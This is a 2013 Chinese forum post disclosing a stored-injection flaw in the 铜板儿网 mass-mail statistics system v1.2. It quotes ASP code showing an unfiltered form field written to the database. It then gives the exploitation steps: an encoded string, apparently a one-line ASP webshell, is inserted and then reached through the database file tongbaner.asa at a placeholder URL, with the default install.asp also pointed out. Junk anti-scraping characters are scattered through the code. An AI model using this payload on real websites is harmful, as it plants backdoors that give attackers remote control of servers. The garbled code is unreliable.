找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2329|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
& @7 [8 {( G5 p+ A4 m2 l" p! k7 c! y3 b3 \
IF Request.QueryString("Action")="del" Then ; G  K- ?6 Q0 q) ]5 w! I
ID=Request.QueryString("ID")
( H7 C9 j* H, J/ X2 v8 f5 Y6 RIF Countss ("tui","Fenlei",ID )<>0 then # ^) c9 e1 E: S* t8 w7 Q
'略
7 G& c5 l# U1 f1 m  zIF Request.QueryString("Action")="Add" Then
* ?1 l- x& T/ b0 a4 s  pTname=Request.Form("Typename")
; I+ ?$ q: w8 J, c  g( n+ F9 I0 r% _Set Rs=Server.CreateObject("adodb.Recordset")
, D( v' d6 Q3 M8 r5 {4 v; K4 ySql="Select * From Fenlei Order by id Desc " 9 B  @" r: |: }# q. c1 N  j7 R1 w
Rs.Open Sql,Conn,1,3 - i1 I# S* J2 T, {
Rs.Addnew : x& _  s5 T% I3 U3 s& w( F
Rs("Typename")=Tname - t9 e4 k& L8 h
'略 9 _* o9 w$ y$ k7 n2 X6 ?
Set Rs=Server.CreateObject("adodb.Recordset")
/ G  a) F. q0 u- x# mSql="Select * From Fenlei Order by id Desc "
$ ^( L, H  ^2 z5 vRs.Open Sql,Conn,1,1 3 S# l/ p7 B0 |* g0 N) Y& N
'略 : q$ L" G. r& q) e! l
%>
3 G) a: j- f/ F# A% Y! S & K' b0 [. V# z! ~9 [

+ A6 s' c& G! u# q, D, p" |  q ; m8 O) ~8 x& R/ ~; Y
没有过滤,直接写入数据库。4 S# V7 {$ b/ ?  {6 r

7 F* P) U- d- w( C* L利用方法:
8 L/ V8 b# H, ?) y  o/ p( o & |6 x+ ]+ v: S5 e
插入:┼攠數畣整爠煥敵瑳∨≡┩>
6 r; \' `2 a3 }/ t0 G
) m' m7 d+ m" b8 Y+ k% H; A; E
% T5 }8 \4 q2 }5 W- A连接: http://www.xxx.com/###tongbaner.asa
: `  w. ]2 l. B# D3 A'默认安装文件:
% T+ j; ~8 x% z- L; p'install.asp
% I" P1 q  r% \: h' n# d) T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表